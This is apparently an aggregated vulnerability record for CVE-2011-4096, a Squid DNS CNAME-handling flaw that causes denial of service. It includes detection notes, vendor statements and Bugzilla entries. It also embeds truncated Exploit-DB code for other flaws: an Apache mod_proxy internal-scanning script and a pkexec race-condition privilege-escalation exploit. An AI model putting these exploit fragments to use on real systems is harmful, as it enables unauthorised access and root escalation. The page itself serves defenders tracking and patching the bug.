CVE-2011-4096
Published 2011-11-17
Priority: P3 · Severity: medium · CVSS 2.0: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
EPSS: 38.32% (98.4th percentile)
The idnsGrokReply function in Squid before 3.1.16 does not properly free memory, which allows remote attackers to cause a denial of service (daemon abort) via a DNS reply containing a CNAME record that references another CNAME record that contains an empty A record.
Affected
61 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| squid-cache | squid | <= 3.1.15 | — |
Detection & IOCs (extracted from sources)
- The vulnerability is triggered by a DNS reply containing a CNAME record that references another CNAME record that contains an empty A record — monitor for such chained CNAME→CNAME→empty-A DNS responses directed at Squid proxy instances.
- The vulnerable code path is in the idnsGrokReply function within src/dns_internal.cc of Squid — focus process-level monitoring and crash analysis on this function in affected Squid versions (before 3.1.16).
- The flaw was introduced with IPv6 support in Squid 3.1 (changes to idnsGrokReply); Squid instances without IPv6 support (e.g., RHEL 4/5 builds) are not affected — scope detection to Squid 3.1.x builds with IPv6 enabled.
- The upstream patch is available at the Launchpad Bazaar repository, revision 10384 of the 3.1 branch — use it to identify the exact code delta for writing targeted detection rules or confirming patch status.
- Only Squid 3.1.x builds with IPv6 support are affected; Squid as shipped with RHEL 4 and RHEL 5 (which lacked IPv6 support) is explicitly not affected.
- The vulnerable merge logic (for AAAA and A result sets) is absent in RHEL 4/5 squid builds, confirming those are safe; detection and patching efforts should focus on Squid 3.1.x with IPv6 enabled.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| vendor_redhat | — | 5.0 | MEDIUM | — |
Red Hat
squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
vendor_redhat · 2011-06-06 · CVSS 5.0 · MEDIUM
Statement: This issue did not affect the versions of squid as shipped with Red Hat Enterprise Linux 4 and 5 as they did not include IPv6 support. This issue was introduced with the addition of IPv6 support in Squid 3.1 (in the changes made to the idnsGrokReply function).
Package: squid (Red Hat Enterprise Linux 4) - Not affected
Package: squid (Red Hat Enterprise Linux 5) - Not affected
GHSA
GHSA-g3fq-pgcr-r7w6: The idnsGrokReply function in Squid before 3
ghsa_unreviewed · 2022-05-17 · MEDIUM
No detection rules found.
Exploit-DB
Apache mod_proxy - Reverse Proxy Exposure
exploitdb · 2011-10-11 · CVE-2011-3368 · CVSS 5.0 · MEDIUM
---
```python
#!/usr/bin/env python
import socket
import string
import getopt, sys

known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
    get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
    get = get + "Host: " + apache_target + "\r\n\r\n"
    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remoteserver.settimeout(3)
    try:
        remoteserver.connect((apache_target, int(apache_port)))
        remoteserver.send(get)
        return remoteserver.recv(4096)
    except:
        return ""

def get_banner(result):
    return result[string.find(result, "\r\n\r\n")+4:]

def scan_host(url, apache_target, apache_port,
```
Exploit-DB
pkexec - Race Condition Privilege Escalation
exploitdb · 2011-10-08 · CVE-2011-1485 · CVSS 6.9 · MEDIUM
---
```c
/*
 * Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
 * Author: xi4oyu
 * Tested on: rhel 6
 * CVE : 2011-1485
 * Linux pkexec exploit by xi4oyu , thx [email protected] * Have fun~
 * U can reach us @ http://www.wooyun.org :)
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int main(int argc, char *argv[], char **envp)
{
    time_t tim_seed1;
    pid_t pid_seed2;
    int result;
    struct stat stat_buff;
    char *chfn_path = "/usr/bin/chfn";
    char cmd_buff[4096];
    char *pkexec_argv[] = {
        "/usr/bin/pkexec",
        "/bin/sh",
        "-c",
        cmd_buff,
        NULL
    };
    int pipe1[2];
    int pipe2[2];
    int pipe3[2];
    pid_t pid, pid2;
    char *chfn_argv[] = {
        "/usr/bin/chfn",
        NULL
    };
    char buff[8];
    char read_buff[4096];
    char real_path
```
Bugzilla
CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record
bugzilla · 2011-10-31 · CVSS 5.0 · MEDIUM
An invalid free flaw was found in the way Squid proxy caching server processed DNS requests, where one CNAME record pointed to another CNAME record pointing to an empty A-record. A remote attacker could issue a specially-crafted DNS request, leading to denial of service (squid daemon abort).
Upstream bug report:
[1] http://bugs.squid-cache.org/show_bug.cgi?id=3237
Relevant upstream patch:
[2] http://bazaar.launchpad.net/~squid/squid/3.1/revision/10384
References:
[3] http://www.squid-cache.org/Versions/v3/3.1/changesets/SQUID_3_1_16.html
[4] http://bugs.squid-cache.org/show_bug.cgi?id=3237#c4
[5] http://bugs.squid-cache.org/show_bug.cgi?id=3237#c5
Discussion
Bugzilla
CVE-2011-4096 squid: Invalid free by processing CNAME DNS record pointing to another CNAME record pointing to an empty A-record [fedora-all]
bugzilla · 2011-10-31 · CVSS 5.0 · MEDIUM
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?ty
Bugzilla
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
bugzilla · 2011-08-30 · CVSS 5.0 · MEDIUM
A flaw was reported [1] in how Squid parsed responses from Gopher servers. This flaw could result in a buffer overflow if a Gopher server were to return a line longer than 4096 bytes, leading to memory corruption and a crash. This flaw is an extension of SQUID-2005:1 (or CVE-2005-0094) in Squid 3.x, due to increased packet read sizes. A malicious user could setup a fake Gopher server and forward requests to it through Squid. A specially crafted response from that server could cause Squid to restart.
This has been corrected in upstream versions 3.2.0.11, 3.1.15, and 3.0.STABLE26. Patches for 3.0 [2], 3.1 [3], and 3.2 [4] are available.
[1] http://www.squid-cache.org/Advisories/SQUID-2011_3.txt
[2] htt
Bugzilla
CVE-2011-2916 freenx-client: qtnx stores configuration, including non-default authentication key, with insecure permissions
bugzilla · 2011-08-11 · CVSS 5.5 · MEDIUM
It was reported [1] that the qtnx client would store non-custom SSH keys in a world-readable configuration file. If a user did not have a properly secured home directory (if it was world-readable or world-executable), this could allow other users on the local system to obtain the private key used to connect to remote NX sessions.
For example:
```
% ls -al .qtnx
total 12
drwxrwxr-x.  2 user user 4096 Aug 11 11:36 .
drwxr-x---. 27 user user 4096 Aug 11 11:37 ..
-rw-rw-r--.  1 user user 1209 Aug 11 11:40 cerb.nxml
% grep Auth .qtnx/cerb.nxml
```
qtnx should probably set the permissions of the *.nxml files to 0600, or the ~/.qtnx/ directory should be mode 0700 (like ~/.ssh/)
References
- http://bugs.squid-cache.org/show_bug.cgi?id=3237#c12
- http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00010.html
- http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00040.html
- http://secunia.com/advisories/46609
- http://secunia.com/advisories/47459
- http://www.mandriva.com/security/advisories?name=MDVSA-2011:193
- http://www.openwall.com/lists/oss-security/2011/10/31/5
- http://www.openwall.com/lists/oss-security/2011/11/01/3
- http://www.redhat.com/support/errata/RHSA-2011-1791.html
- http://www.securitytracker.com/id?1026265
- http://www.squid-cache.org/Versions/v3/3.1/changesets/SQUID_3_1_16.html